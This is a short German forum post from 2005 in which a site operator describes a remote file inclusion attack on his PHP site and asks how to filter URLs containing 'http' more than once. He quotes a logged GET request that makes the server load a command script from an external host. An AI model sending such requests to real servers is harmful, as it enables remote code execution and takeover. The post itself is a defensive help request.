16 Mar
2005
16 Mar
'05
00:11
Hallo zusammen. Ich melde mich betreffend einem PHP / Get Befehl. Durch PHP konnte jemand diverse Scripte von einer externen URL Abrufen (Infolge aktivierter safemode und registerglobalsfunktion). Hier ein Beispiel für einen solchen Zugriff 123.123.123.123- - [15/Mar/2005:] "GET /content/http://externesite.com/cmd?.php HTTP/1.1". Nun zu meiner Frage: Besteht die Möglichkeit, dass man PHP oder den Apache soweit einschränken kann, dass in einer URL nur einmal den Wert http auftreten darf? Wenn ja, kann mir da jemand einen Tipp geben wie ich einen solchen Filter einbauen kann? Vielen Dank für eure Hilfe. Christian